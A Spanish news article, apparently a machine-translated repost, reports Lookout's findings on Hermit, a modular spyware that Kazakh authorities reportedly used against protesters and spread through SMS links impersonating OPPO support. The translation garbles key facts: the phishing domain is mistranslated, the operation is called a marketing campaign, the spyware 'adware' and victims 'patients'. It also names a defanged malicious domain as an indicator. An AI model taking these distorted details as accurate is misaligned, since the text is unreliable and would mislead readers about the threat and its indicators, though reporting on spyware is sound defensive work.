En esta campaña, los perpetradores utilizan OPPO (Guangdong Oppo Cell Telecommunications Corp., Ltd), un fabricante chino de dispositivos móviles y dispositivos electrónicos, como estrategia para ganarse la confianza de sus objetivos. Según los investigadores, los corredores contratados en nombre del gobierno envían mensajes SMS que supuestamente provienen de OPPO, que es un enlace secuestrado maliciosamente a la página web oficial de soporte en idioma kazajo de la compañía: http[://]oppo-kz[.]ayuda al cliente[.]com. (En el momento de la publicación del informe, esa página de soporte se había desconectado). En algunos casos, los atacantes también se hacen pasar por Samsung y Vivo, según Lookout.

La intrusión requiere que la víctima abra el mensaje SMS y haga clic en el hipervínculo a la página web secuestrada. Mientras está cargado, el malware se descarga simultáneamente en el fondo de la máquina objetivo, luego se conecta a un servidor C2 alojado por un pequeño proveedor de servicios en Nur-Sultan, la capital del país.

Como escribió Paul Shunk, investigador de seguridad de Lookout, en un comunicado de prensa: “La combinación de la concentración de clientes que hablan kazajo y la ubicación del servidor C2 de backend es una indicación sólida de que la campaña de marketing está administrada por una entidad en Kazajstán. .” Si bien los investigadores de Lookout reconocieron esa entidad como perteneciente a las autoridades estatales, no le atribuyeron un funcionario o división específica de las autoridades.

el software malicioso

Hermit no es simplemente sutil, es totalmente personalizable.

Está construido de forma modular, lo que significa que sus dueños pueden usar o ignorar algunas de sus 25 partes identificadas, cada una de las cuales tiene una función única. También significa que la implementación de cualquier evento dado de Ermitaño probablemente sea diferente al próximo.

Entre estas muchas capacidades se encuentran la capacidad de transmitir audio, realizar y redirigir llamadas y adquirir datos en el teléfono inteligente de un paciente.

Luego hay capacidades adicionales de área de interés. Por ejemplo, desde que los investigadores mencionaron su informe, “el adware también intenta mantener la integridad de los datos de las ‘pruebas’ recopiladas mediante el envío de un código de autenticación de mensajes basado en hash (HMAC). Esto permite a los actores autenticar quién envió la información y garantizar que la información no cambie”. ¿Por qué llama tanto la atención? Como resultado de “utilizar esta metodología para la transmisión de conocimiento podría permitir la admisibilidad de la prueba recopilada”.

“La invención de Hermit proporciona otra pieza del rompecabezas a la imagen del mercado secreto de instrumentos de vigilancia de ‘intercepción legal’”, escribió Shunk. “Si puede haber un uso real de esta tecnología, definitivamente requiere una supervisión estricta y protecciones contra el abuso”.

La plataforma de hospedaje administrado definitiva

Enlace fuente

El cargo Gobierno de Kazajstán Software espía usado contra manifestantes apareció por primera vez en Lo último en noticias de seguridad cibernética | Actualizaciones de ataques de malware | Noticias de tecnología.

The Ultimate Managed Hosting Platform

Source link

Continue Reading
Advertisement

Trending